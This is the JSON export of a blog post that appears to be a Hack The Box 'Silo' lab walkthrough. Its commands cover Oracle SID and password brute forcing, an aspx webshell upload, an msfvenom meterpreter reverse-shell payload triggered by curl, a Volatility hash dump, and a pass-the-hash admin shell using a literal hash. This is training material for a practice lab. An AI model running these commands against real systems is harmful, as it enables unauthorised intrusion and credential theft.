{"id":30,"date":"2021-02-10T10:01:08","date_gmt":"2021-02-10T10:01:08","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=30"},"modified":"2021-02-10T10:01:22","modified_gmt":"2021-02-10T10:01:22","slug":"htb-silo","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-silo\/","title":{"rendered":"HTB: Silo"},"content":{"rendered":"\n<h2>Enumeration<\/h2>\n\n\n\n<h2>nmap<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/0zhsBeOgN85i0CrFidSxi96LghEvoTcG-0m4H6bsSyAKUzL_gBfYIzX6LT4vO26P1qbu-Q7qU5rkvmYzMejyhu4JUErfT46E9SjW4-_T42TeVmTf4iIp21jVmpv92E7mgHt5FS8a\" alt=\"nmap -sv 10. 10. 10.82 -OA nmap \nstarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-01-08 07:28 EST \nNmap scan report for 10.10. 10.82 \nHost is up (0.66s latency). \nNot shown: \nPORT \n80\/tcp \n135\/tcp \n139\/tcp \n445\/tcp \n1521\/tcp \n49152\/tcp \n49153\/tcp \n49154\/tcp \n49155\/tcp \n49158\/tcp \n49160\/tcp \n49161\/tcp \n988 closed ports \nSTATE \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nSERVICE \nhttp \nmsrpc \nnetbios-ssn \nmicrosoft-ds \noracle-tns \nmsrpc \nmsrpc \nmsrpc \nmsrpc \nmsrpc \noracle-tns \nmsrpc \nService Info: OSS : Windows, \nVERSION \nMicrosoft IIS httpd 8.5 \nMicrosoft Windows RPC \nMicrosoft Windows netbios-ssn \nMicrosoft Windows Server 2008 R2 \n2012 microsoft-ds \nOracle TNS listener 11.2.0.2.0 (unauthorized) \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nOracle TNS listener (requires service name) \nMicrosoft Windows RPC \nWindows Server 2008 R2 \n2012; CPE: cpe:\/o:microsoft:windows\"\/><\/figure>\n\n\n\n<h2>SID Enumeration<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/lh4.googleusercontent.com\/DaM6YcEj_szl0Pf5r4KdFHZojxRSvJSvHOQeyyQUBCgijqITiTXTyc1C9HMAagT9AwOsIfWnzOSy231ttp_wGHUUOHP1Sq2Py6GndLWtMv5l6w5rxuFVBJGKWFr8KrJu4UVatUA6\" alt=\"msf5 auxiliary(scanner\/oracle\/sid brute} \n&gt; set RHOSTS \nRHOSTS -3 \nmsf5 auxiliary(scanner\/oracle\/sid brute} \n&gt; run \nSIDS against \nChecking \nCaught \n571 \nChecking \n- Refused \nChecking \n- Refused \nChecking \nLINUX8174 \n'ORACLE' \nORACLE' \n[+1 \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \ninterrupt from \n'XE' is valid \nChecking 'ASD8' \n- Refused 'ASD8' \nChecking 'IASD8' \n- Refused 'IASD8' \nChecking \nthe console.\"\/><\/figure>\n\n\n\n<h2>Password Guesser &#8211; odat<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/7U9aMhLcPqtl5EUgapzdbotrNspndAF4FHljQNCQuuTasxMkKMYmhZMhMvbD_z7VMvXh8lwvhTvpCUsx6djZ2S5GxKzzTdv2DjLj1xBCl8La_snbQcv0rdCjoHlZNEMdy4JsCucr\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Uploading aspx shell for command injection<\/h2>\n\n\n\n<p>.\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\\inetpub\\wwwroot\\' 'shell.aspx' \/usr\/share\/webshells\/aspx\/cmdasp.aspx --sysdba<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/0nhYgj2gGdXP9RQZ6yia1_N07P_qr_iZFg7Zv7vn434EeEBYOZXHLK2Xaau7RnL0Fc5eovhZ5AdKNvFifsbOLSPEVY0fBMQYAxmIrtHCstwdV61uMNZ0lnNtS8K2kyUnvin9OFr9\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Reverse Shell<\/h2>\n\n\n\n<p>Or create an msfvenom payload for a reverse shell:<br>msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST= LPORT= -f aspx &gt; lisa.aspx<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/8zhe-17bcYSWJA3-YMid2d0bc7BqJjmWe0fmlB6UYhr5y0ph5nauuNKv7EZynQPiVPYP3LjIFEWuWR3kPgQ6zSTNSBMXDghx86zH3S4h-xMno83Nbc_VKGlh6k78rGza1R_CAXxi\" 
alt=\"\"\/><\/figure>\n\n\n\n<p>Upload the file:<br>.\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\\inetpub\\wwwroot\\' 'lisa.aspx' \/root\/odat2.5\/lisa.aspx --sysdba<br>Call the file for the reverse shell:<br>curl <a href=\"#\">http:\/\/10.10.10.82\/lisa.aspx<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/pOOEy37Rd5luwjWEsfAi2h_OnR2r460jgUPMsoQBemlScJmWiPw6E30G5-vjWxqM1Gc0_HvOsPG7V1quRMxxRqjYg4R4tEmg8ArDZ5AK75yUJAkc1JKp_gp4A48Ou6PcFkpYcQYB\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Privilege Escalation<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/SQ-fEoOm8h3B-Bqn9lYQU8nCmPDYc5JS9eKKG7OAyAyeULJIj_lkjRYv-lk0fsqn__NVTp51QBMy4L4ZNppJgqmPbYyaIupreg01btNVb7JsgY8aojQgqzKMbqaePaTQ_8e1IoUu\" alt=\"\"\/><\/figure>\n\n\n\n<p>Download the file.<br>In the dump, to find the valuable info, use Volatility (check the GitHub page).<\/p>\n\n\n\n<h2>Volatility<\/h2>\n\n\n\n<p>Suggested profiles:<br>python vol.py -f \/root\/Downloads\/SILO-20180105-221806.dmp imageinfo<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/VkLTBSYWZG2eWsxdYDxIrn3bZ-4kP6uqlwpjN4KN8lEHOFQ_3nh7yierL2q9mFjDKvw56xCLiPsFc7y9PQScpndxuBqyOwMt7G8PjjOM2Fw2K4c-GoGp-lNfcECRREOl-_O-gzkM\" alt=\"\"\/><\/figure>\n\n\n\n<p>Sysinfo<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/o-xvwRzgIjASiq83PZXNK-dpq5gcQ1pdThNS3QHvXLUKJUtKCs6ZQ4dVu-VxiBZHFnsTY2Jvbcur-dQ2iHQhX9zsCTFI2MgCOSs6mSwUPmJLZY31Eq9BV6QVRdC0JsyTbeS_05XS\" alt=\"\"\/><\/figure>\n\n\n\n<p>python vol.py -f \/root\/Downloads\/SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/lh3.googleusercontent.com\/NURgUJth7oLQ_QvuCQC2UhSaMzt9UTVRjO0RNXZ6X-HyAsROgJOk0OBWRXoweY3RbcjRFixkGVZH5bXjWje5zXrIK6H0jFrDf-FmR5jnv5XeFLu2pkD0rALVn8CY6r3jnId_t4Ej\" alt=\"\"\/><\/figure>\n\n\n\n<p>python vol.py -f \/root\/Downloads\/SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000 hashdump<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/vRlERxb-l0xo5ap51p6yRsJ4Lb59gbc2NQhep9mJeU4DVG77biEmcwb-52_pMEaY6R7I9w_5VhL_wubWHjwbVGO3T99UmEkqMxcKNbmHK-5PuPqWGKMjMQ5a-jm-dvmsFtA-WIoF\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Admin Shell &#8211; Pass the Hash<\/h2>\n\n\n\n<p>pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 \/\/10.10.10.82 cmd.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/pcKC3-hmJyuBxZF9P41nm2t9GcEXEXFX7RzXsS67ILpIV_WrL4FxcVZKz1DWgZhQ7Veb6tQsA6YEgfOiJIdUyxBvdZCKTbvXs1NG1FE5ds45NwJpY3fUK1Hnjp3IWf_9bjLGenoj\" alt=\"\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Enumeration nmap SID Enumeration Password Guesser &#8211; odat Uploading aspx shell for command injection .\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\\inetpub\\wwwroot\\' 'shell.aspx' \/usr\/share\/webshells\/aspx\/cmdasp.aspx --sysdba Reverse Shell Or create an msfvenom payload for a reverse shell: msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST= LPORT= -f aspx &gt; lisa.aspx Upload the file: .\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-silo\/\">Continue reading <span class=\"screen-reader-text\">HTB: 
Silo<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/30"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=30"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions"}],"predecessor-version":[{"id":31,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions\/31"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=30"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=30"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}